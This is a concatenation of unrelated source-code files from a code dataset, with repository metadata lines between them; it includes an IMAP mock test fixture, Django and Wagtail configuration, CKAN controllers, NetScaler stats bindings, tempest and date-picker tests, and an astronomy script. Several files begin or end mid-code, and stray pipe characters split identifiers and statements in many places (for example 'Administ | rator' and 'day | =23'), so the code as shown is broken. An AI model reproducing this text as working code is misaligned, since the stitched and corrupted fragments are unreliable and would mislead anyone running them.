# returns a string list of matching message ids
>>> connection.search(<query>)
("OK", ... "1 2 ... n")
"""
MESSAGES = (
"MIME-Version: 1.0\r\nReceived: by 10.140.91.199 with HTTP; Mon, 27 Jan 2014 13:52:30 -0800 (PST)\r\nDate: Mon, 27 Jan 2014 19:52:30 -0200\r\nDelivered-To: nurse@example.com\r\nMessage-ID: <10101010101010010000010101010001010101001010010000001@mail.example.com>\r\nSubject: spam1\r\nFrom: Mr. Gumby <gumby@example.com>\r\nTo: The nurse <nurse@example.com>\r\nContent-Type: text/plain; charset=ISO-8859-1\r\n\r\nNurse!\r\n\r\n\r\n",
"MIME-Version: 1.0\r\nReceived: by 10.140.91.199 with HTTP; Mon, 27 Jan 2014 13:52:47 -0800 (PST)\r\nDate: Mon, 27 Jan 2014 19:52:47 -0200\r\nDelivered-To: nurse@example.com\r\nMessage-ID: <101010101010100100000101010100010101010010100100000010@mail.example.com>\r\nSubject: spam2\r\nFrom: Mr. Gumby <gumby@example.com>\r\nTo: The nurse <nurse@example.com>\r\nContent-Type: text/plain; charset=ISO-8859-1\r\n\r\nNurse, nurse!",
"MIME-Version: 1.0\r\nReceived: by 10.140.91.199 with HTTP; Mon, 27 Jan 2014 13:54:54 -0800 (PST)\r\nDate: Mon, 27 Jan 2014 19:54:54 -0200\r\nDelivered-To: nurse@example.com\r\nMessage-ID: <1010101010101001000001010101000101010100101001000000101@mail.example.com>\r\nSubject: spamalot1\r\nFrom: Mr. Gumby <gumby@example.com>\r\nTo: The nurse <nurse@example.com>\r\nContent-Type: text/plain; charset=ISO-8859-1\r\n\r\nNurse!\r\n\r\n\r\n",
"MIME-Version: 1.0\r\n\r\nReceived: by 10.140.91.199 with HTTP; Mon, 27 Jan 2014 13:54:54 -0800 (PST)\r\nDate: Mon, 27 Jan 2014 19:54:54 -0200\r\nDelivered-To: nurse@example.com\r\nMessage-ID: <101010101010100100000101010100010101010010100100000010101@mail.example.com>\r\nSubject: spamalot2\r\nFrom: Mr. Gumby <gumby@example.com>\r\nTo: The nurse <nurse@example.com>\r\nContent-Type: text/plain; charset=ISO-8859-1\r\n\r\nNurse! ... Nurse! ... Nurse!\r\n\r\n\r\n",
)
SPAM = {
"INBOX": [
{"uid": "483209", "headers": MESSAGES[0], "complete": MESSAGES[0], "flags": ""},
{"uid": "483211", "headers": MESSAGES[1], "complete": MESSAGES[1], "flags": ""},
{"uid": "483225", "headers": MESSAGES[2], "complete": MESSAGES[2], "flags": ""},
],
"Draft": [
{"uid": "483432", "headers": MESSAGES[3], "complete": MESSAGES[3], "flags": ""},
],
}
RESULTS = {
# <query string>: [<str uid> | <long id>, ...]
"INBOX": {"(ALL)": (1, 2, 3), "(1:3)": (1, 2, 3)},
"Draft": {"(1:1)": (1,)},
}
class Connection(object):
"""Dummy connection object for the imap client.
By default, uses the module SPAM and RESULT
sets (use Connection.setup for custom values)"""
def login(self, user, password):
pass
def __init__(self):
self._readonly = False
self._mailbox = None
self.setup()
def list(self):
return ("OK", ['(\\HasNoChildren) "/" "%s"' % key for key in self.spam])
def select(self, tablename, readonly=False):
self._readonly = readonly
"""args: mailbox, boolean
result[1][0] -> int last message id / mailbox length
result[0] = 'OK'
"""
self._mailbox = tablename
return ("OK", (len(SPAM[self._mailbox]), None))
def uid(self, command, uid, arg):
"""args:
command: "search" | "fetch"
uid: None | uid
parts: "(ALL)" | "(RFC822 FLAGS)" | "(RFC822.HEADER FLAGS)"
"search", None, "(ALL)" -> ("OK", ("uid_1 uid_2 ... uid_<mailbox length>", None))
"search", None, "<query>" -> ("OK", ("uid_1 uid_2 ... uid_n", None))
"fetch", uid, parts -> ("OK", (("<id> ...", "<raw message as specified in parts>"), "<flags>")
[0] [1][0][0] [1][0][1] [1][1]
"""
if command == "search":
return self._search(arg)
elif command == "fetch":
return self._fetch(uid, arg)
def _search(self, query):
return (
"OK",
(" ".join([str(item["uid"]) for item in self._get_messages(query)]), None),
)
def _fetch(self, value, arg):
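# "value" may be an int message id (1-based) or a string uid; for strings
# "value - 1" raises TypeError, which triggers the uid lookup below.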
try:
message = self.spam[self._mailbox][value - 1]
message_id = value
except TypeError:
for x, item in enumerate(self.spam[self._mailbox]):
if item["uid"] == value:
message = item
message_id = x + 1
break
parts = "headers"
if arg in ("(ALL)", "(RFC822 FLAGS)"):
parts = "complete"
return ("OK", (("%s " % message_id, message[parts]), message["flags"]))
def _get_messages(self, query):
if query.strip().isdigit():
return [
self.spam[self._mailbox][int(query.strip()) - 1],
]
elif query[1:-1].strip().isdigit():
return [
self.spam[self._mailbox][int(query[1:-1].strip()) - 1],
]
elif query[1:-1].replace("UID", "").strip().isdigit():
for item in self.spam[self._mailbox]:
if item["uid"] == query[1:-1].replace("UID", "").strip():
return [
item,
]
messages = []
try:
for m in self.results[self._mailbox][query]:
try:
self.spam[self._mailbox][m - 1]["id"] = m
messages.append(self.spam[self._mailbox][m - 1])
except TypeError:
for x, item in enumerate(self.spam[self._mailbox]):
if item["uid"] == m:
item["id"] = x + 1
messages.append(item)
break
except IndexError:
# message removed
pass
return messages
except KeyError:
raise ValueError("The client issued an unexpected query: %s" % query)
def setup(self, spam={}, results={}):
"""adds custom message and query databases or sets
the values to the module defaults.
"""
self.spam = spam
self.results = results
if not spam:
for key in SPAM:
self.spam[key] = []
for d in SPAM[key]:
self.spam[key].append(d.copy())
if not results:
for key in RESULTS:
self.results[key] = RESULTS[key].copy()
|
finder/mako_base | urls.py | Python | mit | 770 | 0.018182 | from django.conf.urls.defaults import *
from django.conf import settings
import base
# Uncomment the next two lines to enable the admin:
from django.contrib import admin
admin.autodiscover()
urlpatterns = patterns('',
# Example:
# (r'^quotes/', include('quotes.foo.urls')),
# Uncomment the admin/doc line below and add 'django.contrib.admindocs'
# to INSTALLED_APPS to enable admin documentation:
# (r'^admin/doc/', include('django.contrib.admindocs.urls')),
# Uncomment the next line to enable the admin:
(r'^admin/', include(admin.site.urls)),
(r'^$', base.views.home),
)
if settings.DEBUG:
urlpatterns += patterns('',
(r'^media/(?P<path>.*)$','django.views.static.serve',{'document_root':settings.MEDIA_ROOT})
)
|
olysonek/tuned | tuned/plugins/__init__.py | Python | gpl-2.0 | 49 | 0 | from .repository import *
from . import instance | |
allcaps/wagtail-robot-nao | wagtailrobot/home/models.py | Python | bsd-3-clause | 1,051 | 0.000951 | from __future__ import absolute_import, unicode_literals
from django import forms
from wagtail.wagtailadmin.edit_handlers import FieldPanel, StreamFieldPanel
from wagtail.wagtailcore.blocks import (
FieldBlock,
RichTextBlock,
StreamBlock,
StructBlock,
)
from wagtail.wagtailcore.fields import StreamField
from wagtail.wagtailcore.models import Page as BasePage
from wagtail.wagtailimages.blocks import ImageChooserBlock
from wagtail.wagtailsearch import index
class ImageBlock(StructBlock):
image = ImageChooserBlock()
class Meta:
template = 'home/blocks/image_block.html'
class webappStreamBlock(StreamBlock):
intro = RichTextBlock(icon="pilcrow")
paragraph = RichTextBlock(icon="pilcrow")
image = ImageBlock(label="Image", icon="image")
class Page(BasePage):
body = StreamField(webappStreamBlock())
search_fields = BasePage.search_fields + [
index.SearchField('body'),
]
Page.content_panels = [
FieldPanel('title', classname="full title"),
StreamFieldPanel('body'),
]
|
matrix-org/pymacaroons | pymacaroons/field_encryptors/secret_box_encryptor.py | Python | mit | 1,205 | 0 | from base64 import standard_b64encode, standard_b64decode
import nacl.bindings
import nacl.utils
from nacl.secret import SecretBox
from pymacaroons.field_encryptors.base_field_encryptor import (
BaseFieldEncryptor
)
from pymacaroons.utils import (
truncate_or_pad, convert_to_bytes, convert_to_string
)
class SecretBoxEncryptor(BaseFieldEncryptor):
def __init__(self, signifier=None, nonce=None):
super(SecretBoxEncryptor, self).__init__(
signifier=signifier or 'sbe::'
)
self.nonce = nonce or nacl.utils.random(
nacl.bindings.crypto_secretbox_NONCEBYTES
)
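# Note: the nonce is generated once at construction time and reused for
# every encrypt() call on this instance.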
def encrypt(self, signature, field_data):
encrypt_key = truncate_or_pad(signature)
box = SecretBox(key=encrypt_key)
encrypted = box.encrypt(convert_to_bytes(field_data), nonce=self.nonce)
return self._signifier + standard_b64encode(encrypted)
def decrypt(self, signature, field_data):
key = truncate_or_pad(signature)
box = SecretBox(key=key)
encoded = convert_to_bytes(field_data[len(self.signifier):])
decrypted = box.decrypt(standard_b64decode(encoded))
return convert_to_string(decrypted)
|
printedheart/h2o-3 | h2o-docs/src/booklets/v2_2015/source/deeplearning/deeplearning_inspect_model.py | Python | apache-2.0 | 369 | 0.00271 | # View the specified parameters of your deep learning model
model.params
# Examine the performance of the trained model
model # display all performance metrics
model.model_performance(train=True) # training set metrics
model.model_performance(valid=True) # validation set metrics
# Get MSE only
model.mse(valid=True)
# Cross-validated MSE
model_cv.mse(xval=True) |
QuantCrimAtLeeds/PredictCode | tests/gui/tk/date_picker_test.py | Python | artistic-2.0 | 2,322 | 0.004737 | import pytest
import unittest.mock as mock
import datetime
import open_cp.gui.tk.date_picker as date_picker
@pytest.fixture
def dp():
with mock.patch("open_cp.gui.tk.date_picker._DatePickerView") as clazzmock:
yield date_picker.DatePicker()
def test_days_to_text(dp):
import locale
if locale.getdefaultlocale()[0][:2] != "en":
return
assert dp.day_to_text(0) == "Mon"
assert dp.day_to_text(1) == "Tue"
assert dp.day_to_text(2) == "Wed"
assert dp.day_to_text(3) == "Thu"
assert dp.day_to_text(4) == "Fri"
assert dp.day_to_text(5) == "Sat"
assert dp.day_to_text(6) == "Sun"
with pytest.raises(ValueError):
dp.day_to_text(-1)
with pytest.raises(ValueError):
dp.day_to_text(7)
def test_first_day_of_week(dp):
assert dp.first_day_of_week == "Mon"
dp.first_day_of_week = "Sun"
assert dp.first_day_of_week == "Sun"
dp._view.make_day_labels.assert_called_once_with()
dp._view.make_date_grid.assert_called_once_with()
with pytest.raises(ValueError):
dp.first_day_of_week = "Tue"
def test_month_year(dp):
now = datetime.datetime.now()
assert dp.month_year == (now.month, now.year)
dp.month_year = (1, 1987)
assert dp.month_year == (1, 1987)
dp._view.refresh_month_year.assert_called_once_with()
dp.month_year = ("12", "2023")
assert dp.month_year == (12, 2023)
with pytest.raises(ValueError):
dp.month_year = 5
with pytest.raises(ValueError):
dp.month_year = (0, 1987)
with pytest.raises(ValueError):
dp.month_year = (13, 1982)
def test_set_selected(dp):
d = datetime.date.today()
assert d == dp.selected_date
dp.selected_date = datetime.date(year=2011, month=5, day=23)
assert dp.selected_date == datetime.date(year=2011, month=5, day=23)
dp._view.refresh_month_year.assert_called_once_with()
with pytest.raises(ValueError):
dp.selected_date = 5
def test_command(dp):
cmd = mock.MagicMock()
dp.command = cmd
d = datetime.date(year=2011, month=5, day | =23)
dp.selected_date = d
cmd.assert_called_once_with(d)
def test_set_colour(dp):
dp.selected_colour = "#aa66ff"
assert dp.selected_colour == "#aa66ff"
dp._view.make_date_grid.assert_called_once_with()
|
icoxfog417/pykintone | tests/test_comment.py | Python | apache-2.0 | 1,667 | 0.000612 | # -*- coding: utf-8 -*-
import unittest
import pykintone
from pykintone.model import kintoneModel
import tests.envs as envs
class TestAppModelSimple(kintoneModel):
def __init__(self):
super(TestAppModelSimple, self).__init__()
self.my_key = ""
self.stringField = ""
class TestComment(unittest.TestCase):
def test_comment(self):
app = pykintone.load(envs.FILE_PATH).app()
model = TestAppModelSimple()
model.my_key = "comment_test"
model.stringField = "comment_test_now"
result = app.create(model)
self.assertTrue(result.ok) # confirm create the record to test comment
_record_id = result.record_id
# create comment
r_created = app.comment(_record_id).create("コメントのテスト")
self.assertTrue(r_created.ok)
# requires that an "Administrator" user is registered in kintone
r_created_m = app.comment(_record_id).create("メンションのテスト", [("Administ | rator", "USER")])
self.assertTrue(r_created_m.ok)
# select comment
r_selected = app.comment(_record_id).select(True, 0, 10)
self.assertTrue(r_selected.ok)
self.assertEqual(2, len(r_selected.raw_comments))
comments = r_selected.comments()
self.assertEqual(1, len(comments[-1].mentions))
# delete comment
for c in comments:
r_deleted = app.comment(_record_id).delete(c.comment_id)
self.assertTrue(r_deleted.ok)
r_selected = app.comment(_record_id).select()
self.assertEqual(0, len(r_selected.raw_comments))
# done test
app.delete(_record_id)
|
gwpy/gwsumm | gwsumm/html/tests/test_static.py | Python | gpl-3.0 | 1,947 | 0 | # -*- coding: utf-8 -*-
# Copyright (C) Alex Urban (2019)
#
# This file is part of GWSumm.
#
# GWSumm is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# GWSumm is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GWSumm. If not, see <http://www.gnu.org/licenses/>.
"""Unit tests for gwsumm.html.static
"""
__author__ = 'Alex Urban <alexander.urban@ligo.org>'
from collections import OrderedDict
from .. import static
# test simple utils
def test_get_css():
css = static.get_css()
assert isinstance(css, OrderedDict)
# test dict keys
assert list(css.keys()) == [
'font-awesome',
'font-awesome-solid',
'gwbootstrap',
]
# test list of files
css_files = list(x.split('/')[-1] for x in css.values())
assert css_files == [
'fontawesome.min.css',
'solid.min.css',
'gwbootstrap.min.css',
]
def test_get_js():
js = static.get_js()
assert isinstance(js, OrderedDict)
# test dict keys
assert list(js.keys()) == [
'jquery',
'jquery-ui',
'moment',
'bootstrap',
'fancybox',
'datepicker',
'gwbootstrap',
]
# test list of files
js_files = list(x.split('/')[-1] for x in js.values())
assert js_files == [
'jquery-3.5.1.min.js',
'jquery-ui.min.js',
'moment.min.js',
'bootstrap.bundle.min.js',
'jquery.fancybox.min.js',
'bootstrap-datepicker.min.js',
'gwbootstrap-extra.min.js',
]
|
bishalkc/portal-andino-theme | ckanext/gobar_theme/controller.py | Python | agpl-3.0 | 3,532 | 0.001699 | from ckan.controllers.home import HomeController
from ckan.controllers.api import ApiController
from ckan.common import c
import ckan.logic as logic
import ckan.model as model
import ckan.lib.base as base
import json
import ckan.plugins as p
from ckanext.googleanalytics.controller import GAApiController
class GobArHomeController(HomeController):
def _list_groups(self):
context = {
'model': model,
'session': model.Session,
'user': c.user or c.author
}
data_dict_page_results = {
'all_fields': True,
'type': 'group',
'limit': None,
'offset': 0,
}
return logic.get_action('group_list')(context, data_dict_page_results)
def _featured_packages(self):
context = {
'model': model,
'session': model.Session,
'user': c.user or c.author,
'for_view': True
}
data_dict = {
'q': ''
}
search = logic.get_action('package_search')(context, data_dict)
if 'results' in search:
results = search['results']
featured_packages = []
for result in results:
for extra_pair in result['extras']:
if extra_pair['key'] == 'home_featured' and extra_pair['value'] == 'true':
featured_packages.append(result)
segmented_packages = [featured_packages[n:n + 2] for n in range(len(featured_packages))[::2]]
return segmented_packages
return []
def index(self):
c.groups = self._list_groups()
c.sorted_groups = sorted(c.groups, key=lambda x: x['display_name'].lower())
c.featured_packages = self._featured_packages()
return super(GobArHomeController, self).index()
def about(self):
return base.render('about.html')
def about_our_site(self):
return base.render('static/about_our_site.html')
def about_developers(self):
return base.render('static/about_developers.html')
def about_glossary(self):
return base.render('static/about_glossary.html')
class GobArApiController(GAApiController, ApiController):
def _remove_extra_id_field(self, json_string):
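# datastore_search responses include a synthetic "_id" column; strip it
# from both the field list and every record before returning the JSON.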
json_dict = json.loads(json_string)
has_extra_id = False
if 'result' in json_dict and 'fields' in json_dict['result']:
for field in json_dict['result']['fields']:
if 'id' in field and field['id'] == '_id':
has_extra_id = True
json_dict['result']['fields'].remove(field)
if has_extra_id and 'records' in json_dict['result']:
for record in json_dict['result']['records']:
if '_id' in record:
del record['_id']
return json.dumps(json_dict)
def action(self, logic_function, ver=None):
default_response = super(GobArApiController, self).action(logic_function, ver)
if logic_function == 'datastore_search':
default_response = self._remove_extra_id_field(default_response)
return default_response
def status(self):
context = {'model': model, 'session': model.Session}
data_dict = {}
status = logic.get_action('status_show')(context, data_dict)
gobar_status = logic.get_action('gobar_status_show')(context, data_dict)
status['gobar_artifacts'] = gobar_status
return self._finish_ok(status)
|
kusm/dnschecker | config.py | Python | mit | 750 | 0 | #! /usr/bin/env python
# coding:utf-8
# Directory containing the record (zone) files.
# By default they are expected under zones/ in the directory
# where this script file lives.
zone_dir = "testzones"
# Directory where the generated HTML is placed
html_dir = "build"
# Directory holding metadata about the records
record_info_dir = "testzones"
# Zone file names for A records
a_record_filenames = [
"example.jp.zone",
]
# Zone file names for PTR records and their networks
ptr_record_filename_networks = [
('192.168.0.rev', '192.168.0.0/24'),
]
# Files containing record information
record_info_filenames = [
'192.168.0.info',
]
|
aserebryakov/godville-monitor-console | monitor/status_processing/__init__.py | Python | gpl-2.0 | 23 | 0 | from .rule import Rule |
googleapis/python-bigquery | samples/magics/conftest.py | Python | apache-2.0 | 1,166 | 0 | # Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
interactiveshell = pytest.importorskip("IPython.terminal.interactiveshell")
tools = pytest.importorskip("IPython.testing.tools")
@pytest.fixture(scope="session")
def ipython():
config = tools.default_config()
config.TerminalInteractiveShell.simple_prompt = True
shell = interactiveshell.TerminalInteractiveShell.instance(config=config)
return shell
@pytest.fixture(autouse=True)
def ipython_interactive(ipython):
"""Activate IPython's builtin hooks
for the duration of the test scope.
"""
with ipython.builtin_trap:
yield ipython
|
kf5grd/push2clip | setup.py | Python | gpl-3.0 | 357 | 0.014006 | from setuptools import setup
setup(
name='push2clip',
version='0.1',
py_modules=
['push2clip'],
install_requires=[
'Click',
'requests',
],
entry_points='''
[console_scripts]
push2clip=push2clip:cli
''',
)
| |
mahabs/nitro | nssrc/com/citrix/netscaler/nitro/resource/stat/pq/pq_stats.py | Python | apache-2.0 | 5,276 | 0.039803 | #
# Copyright (c) 2008-2015 Citrix Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_resource
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_response
from nssrc.com.citrix.netscaler.nitro.service.options import options
from nssrc.com.citrix.netscaler.nitro.exception.nitro_exception import nitro_exception
from nssrc.com.citrix.netscaler.nitro.util.nitro_util import nitro_util
class pq_stats(base_resource) :
def __init__(self) :
self._clearstats = ""
self._pqtotalpolicymatches = 0
self._pqpolicymatchesrate = 0
self._pqtotalthresholdfailed = 0
self._pqthresholdfailedrate = 0
self._pqpriority1requests = 0
self._pqpriority1requestsrate = 0
self._pqpriority2requests = 0
self._pqpriority2requestsrate = 0
self._pqpriority3requests = 0
self._pqpriority3requestsrate = 0
@property
def clearstats(self) :
"""Clear the statsistics / counters.<br/>Possible values = basic, full.
"""
try :
return self._clearstats
except Exception as e:
raise e
@clearstats.setter
def clearstats(self, clearstats) :
"""Clear the statsistics / counters
"""
try :
self._clearstats = clearstats
except Exception as e:
raise e
@property
def pqpriority2requestsrate(self) :
"""Rate (/s) counter for pqpriority2requests.
"""
try :
return self._pqpriority2requestsrate
except Exception as e:
raise e
@property
def pqpolicymatchesrate(self) :
"""Rate (/s) counter for pqtotalpolicymatches.
"""
try :
return self._pqpolicymatchesrate
except Exception as e:
raise e
@property
def pqpriority1requestsrate(self) :
"""Rate (/s) counter for pqpriority1requests.
"""
try :
return self._pqpriority1requestsrate
except Exception as e:
raise e
@property
def pqthresholdfailedrate(self) :
"""Rate (/s) counter for pqtotalthresholdfailed.
"""
try :
return self._pqthresholdfailedrate
except Exception as e:
raise e
@property
def pqtotalpolicymatches(self) :
"""Number of times the Netscaler appliance matched an incoming request using any priority queuing policy.
"""
try :
return self._pqtotalpolicymatches
except Exception as e:
raise e
@property
def pqpriority1requests(self) :
"""Number of priority 1 requests that the Netscaler appliance received.
"""
try :
return self._pqpriority1requests
except Exception as e:
raise e
@property
def pqpriority3requestsrate(self) :
"""Rate (/s) counter for pqpriority3requests.
"""
try :
return self._pqpriority3requestsrate
except Exception as e:
raise e
@property
def pqpriority3requests(self) :
"""Number of priority 3 requests that the Netscaler appliance received.
"""
try :
return self._pqpriority3requests
except Exception as e:
raise e
@property
def pqpriority2requests(self) :
"""Number of priority 2 requests that the Netscaler appliance received.
"""
try :
return self._pqpriority2requests
except Exception as e:
raise e
@property
def pqtotalthresholdfailed(self) :
"""Number of times the Netscaler appliance failed to match an incoming request to any of priority queing policy.
"""
try :
return self._pqtotalthresholdfailed
except Exception as e:
raise e
def _get_nitro_response(self, service, response) :
""" converts nitro response into object and returns the object array in case of get request.
"""
try :
result = service.payload_formatter.string_to_resource(pq_response, response, self.__class__.__name__.replace('_stats',''))
if(result.errorcode != 0) :
if (result.errorcode == 444) :
service.clear_session(self)
if result.severity :
if (result.severity == "ERROR") :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
else :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
return result.pq
except Exception as e :
raise e
def _get_object_name(self) :
""" Returns the value of object identifier argument
"""
try :
return None
except Exception as e :
raise e
@classmethod
def get(cls, service, name="", option_="") :
""" Use this API to fetch the statistics of all pq_stats resources that are configured on netscaler.
"""
try :
obj = pq_stats()
if not name :
response = obj.stat_resources(service, option_)
return response
except Exception as e:
raise e
class Clearstats:
basic = "basic"
full = "full"
class pq_response(base_response) :
def __init__(self, length=1) :
self.pq = []
self.errorcode = 0
self.message = ""
self.severity = ""
self.sessionid = ""
self.pq = [pq_stats() for _ | in range(length)]
|
rumblesan/diddy-vm | puff/tokens.py | Python | mit | 598 | 0 | #!/usr/bin/env python
def NUMBER(value):
return ("NUMBER", value)
def NAME(value):
return ("NAME", value)
def SYMBOL(value):
return ("SYMBOL", value)
def SEMICOLON():
return ("SEMICOLON", )
def OPENPAREN():
return ("OPENPAREN", | )
def CLOSEPAREN():
return ("CLOSEPAREN | ", )
def OPENBRACKET():
return ("OPENBRACKET", )
def CLOSEBRACKET():
return ("CLOSEBRACKET", )
def ASSIGNMENT():
return ("ASSIGNMENT", )
def EOF():
return ("EOF", )
def FUNCTIONDEF():
return ("FUNCTIONDEF", )
def FUNCTIONRETURN():
return ("FUNCTIONRETURN", )
|
beeryardtech/scripts | python/dk_test/libs/nodes.py | Python | apache-2.0 | 3,032 | 0.033971 | #-------------------------------------------------------------------------------
# Name: nodes
#-------------------------------------------------------------------------------
from __future__ import with_statement
__author__ = "Travis Goldie"
__email__ = "test_automation@us.sios.com"
__date__ = "11/14/12"
__copyright__ = "(c) SIOS Technology Corp 2012"
import sys
from dkutils import normjoin, cleanValue
class dknode():
def __init__(self, _config, _nodeName, _properties):
"""
Purpose:
Stores all the properties of a node.
Note:
-- Each node must have either a private IP or a public IP (or both)
-- Must include the corresponding submask for each IP
-- Vols/shareds can be either in a single delimited list:
volume="F,G,H"
or per line:
volume0="F"
volume1="G"
"""
self.properties = _properties
self.nodeName = _nodeName
self.config = _config
self.props = dict(( | propName.lower(), cleanValue(prop)) for
propName, prop in self.properties )
#If any of these props are in self.properties,
#create key and set to a default value (or to blank)
self.props["hostname"] = self.props.get("hostname", self.nodeName)
#List of possible names or IDs to id the node
self.system = [self.props.get("hostname"),
self.props.get("publicip"),
| self.props.get("privateip")]
self.volsformirror = self._loadVolsForMirror()
#self.sharedformirror = self._loadSharedForMirror()
self.allVols = self.volsformirror
pass
#---------------------------------------------------------------------------
# Local get functions
#---------------------------------------------------------------------------
def _loadVolsForMirror(self):
"""
Purpose:
Get the list of volumes (non-shared) from the properties dict
"""
return self._loadList("volume")
def _loadSharedForMirror(self):
"""
Purpose:
Get the list of shared volumes from the properties dict
"""
return self._loadList("sharedForMirror")
def _loadList(self, keyName):
"""
Purpose:
Gets list of volume letters. Must have at least one vol or shared vol.
Returns:
List of drive letters (strings)
"""
listResult = []
keyName = keyName.lower()
for key, val in self.props.items():
            #If given in a delimited list, split on the known delimiters
            if key == keyName and val:
                return self.config.splitAndLower(val)
#Build list for each line with the same name and ends in a digit
#See example in docstring of __init__
if key.startswith(keyName) and key[-1].isdigit() and val:
listResult.append(cleanValue(val))
if len(listResult) == 0:
return ''
else:
return [ result.lower() for result in listResult ]
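    # Illustrative behaviour (hypothetical properties): with per-line entries
    # volume0="F" and volume1="G", _loadList("volume") returns ['f', 'g'];
    # with a single delimited list volume="F,G,H" it defers to
    # self.config.splitAndLower instead.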
if __name__ == "__main__":
config = dkconfig(r"c:\Programs\dk_test\tmp\cluster.ini.tmp")
config.runEnvSetup()
config.runFinalTearDown()
|
bozzzzo/quark | quarkc/test/emit/expected/py/int-methods/setup.py | Python | apache-2.0 | 242 | 0 | # Setup file for package int_methods
from setuptools | import setup
setup(name="int_methods",
version="0.0.1",
install_requires=["quark==0.0.1"],
py_modules=['int_met | hods'],
packages=['int_methods', 'int_methods_md'])
|
CiscoSystems/tempest | tempest/scenario/test_minimum_basic.py | Python | apache-2.0 | 5,548 | 0 | # Copyright 2013 NEC Corporation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest.common import custom_matchers
from tempest import config
from tempest import exceptions
from tempest.openstack.common import log as logging
from tempest.scenario import manager
from tempest import test
CONF = config.CONF
LOG = logging.getLogger(__name__)
class TestMinimumBasicScenario(manager.ScenarioTest):
"""
This is a basic minimum scenario test.
This test below:
* across the multiple components
* as a regular user
* with and without optional parameters
* check command outputs
"""
def _wait_for_server_status(self, status):
server_id = self.server['id']
# Raise on error defaults to True, which is consistent with the
# original function from scenario tests here
self.servers_client.wait_for_server_status(server_id, status)
def nova_keypair_add(self):
self.keypair = self.create_keypair()
def nova_boot(self):
create_kwargs = {'key_name': self.keypair['name']}
self.server = self.create_server(image=self.image,
create_kwargs=create_kwargs)
def nova_list(self):
_, servers = self.servers_client.list_servers()
# The list servers in the compute client is inconsistent...
servers = servers['servers']
self.assertIn(self.server['id'], [x['id'] for x in servers])
def nova_show(self):
_, got_server = self.servers_client.get_server(self.server['id'])
self.assertThat(
self.server, custom_matchers.MatchesDictExceptForKeys(
got_server, excluded_keys=['OS-EXT-AZ:availability_zone']))
def cinder_create(self):
self.volume = self.create_volume()
def cinder_list(self):
volumes = self.volumes_client.list_volumes()
self.assertIn(self.volume['id'], [x['id'] for x in volumes])
def cinder_show(self):
volume = self.volumes_client.get_volume(self.volume['id'])
self.assertEqual(self.volume, volume)
def nova_volume_attach(self):
volume_device_path = '/dev/' + CONF.compute.volume_device_name
volume = self.servers_client.attach_volume(
self.server['id'], self.volume['id'], volume_device_path)
self.assertEqual(self.volume['id'], volume['id'])
self.volumes_client.wait_for_volume_status(volume['id'], 'in-use')
# Refresh the volume after the attachment
self.volume = self.volumes_client.get_volume(volume['id'])
def nova_reboot(self):
self.servers_client.reboot(self.server['id'], 'SOFT')
self._wait_for_server_status('ACTIVE')
def check_partitions(self):
# NOTE(andreaf) The device name may be different on different guest OS
partitions = self.linux_client.get_partitions()
self.assertEqual(1, partitions.count(CONF.compute.volume_device_name))
def nova_volume_detach(self):
self.servers_client.detach_volume(self.server['id'], self.volume['id'])
self.volumes_client.wait_for_volume_status(self.volume['id'],
'available')
volume = self.volumes_client.get_volume(self.volume['id'])
self.assertEqual('available', volume['status'])
def create_and_add_security_group(self):
secgroup = self._create_security_group()
self.servers_client.add_security_group(self.server['id'],
secgroup['name'])
self.addCleanup(self.servers_client.remove_security_group,
self.server['id'], secgroup['name'])
def wait_for_secgroup_add():
_, body = self.servers_client.get_server(self.server['id'])
return {'name': secgroup['name']} in body['security_groups']
if not test.call_until_true(wait_for_secgroup_add,
CONF.compute.build_timeout,
CONF.compute.build_interval):
msg = ('Timed out waiting for adding security group %s to server '
'%s' % (secgroup['id'], self.server['id']))
raise exceptions.TimeoutException(msg)
@test.services('compute', 'volume', 'image', 'network')
def test_minimum_basic_scenario(self):
self.glance_image_create()
self.nova_keypair_add()
self.nova_boot()
self.nova_list()
self.nova_show()
self.cinder_create()
self.cinder_list()
self.cinder_show()
self.nova_volume_attach()
self.addCleanup(self.nova_volume_detach)
self.cinder_show()
self.floating_ip = self.create_floating_ip(self.server)
self.create_and_add_security_group()
self.linux_client = self.get_remote_client(self.floating_i | p['ip'])
self.nova_reboot()
self.linux_client = self.get_remote_client(self.floating_i | p['ip'])
self.check_partitions()
|
tvwenger/galfacts | find_sources.py | Python | mit | 6,373 | 0.01067 | """
find_sources.py
Find sources in GALFACTS transient search
03 June 2014 - Trey Wenger - creation
12 June 2014 - Trey Wenger - fixed smoothing convolution normalization
bug in beam.py
"""
vers = "v1.0.1"
import sys
import os
import argparse
import numpy as np
import beam
def main(**options):
"""Main script for finding GALFACTS sources"""
print("find_sources.py {0}".format(vers))
for b in options["beams"]:
if options["verbose"]:
print("Log: Starting beam {0} analysis.".format(b))
this_beam = beam.Beam(b, **options)
this_beam.find_sources()
if options["verbose"]:
print("Log: Done!")
